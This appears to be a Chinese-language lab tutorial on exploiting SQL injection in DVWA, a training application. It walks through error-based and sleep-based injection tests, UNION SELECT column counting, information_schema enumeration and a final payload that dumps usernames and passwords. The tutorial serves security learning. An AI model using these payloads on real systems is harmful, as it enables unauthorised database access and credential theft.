登录靶机，进入dvwa

首先判断注入点：

1，错误的注入

输入框输入单引号'，作用是闭合sql语句，点击submit

报语法错误，说明输入的内容未作任何处理，单引号被成功带入了sql

2，时间盲注

输入单引号发现页面没有报错，无任何变化，尝试用sleep方法 （1' and sleep(6) -- ）

发现左上角有加载的动作，说明sleep方法起了作用，判断出这里有注入点

 

然后测试查询语句的字段数

通过' union select 1 --

如果报错说明查询语句的字段数不对，继续用' union select 1,2 -- 

判断出是两个字段

然后查询相关信息

version(),版本信息 database()当前数据库名 user()当前用户名

concat可以把多个字段作为一个字段输出

Information_schema 记录数据库的信息

查询数据库信息 ' union select table_schema,1 from information_schema.tables --

查询库和表 ' union select table_schema,table_name from information_schema.tables --

查询users表的字段信息' union select 1,column_name from information_schema.columns where table_name='users' --

查询账号密码' union select user,password from users --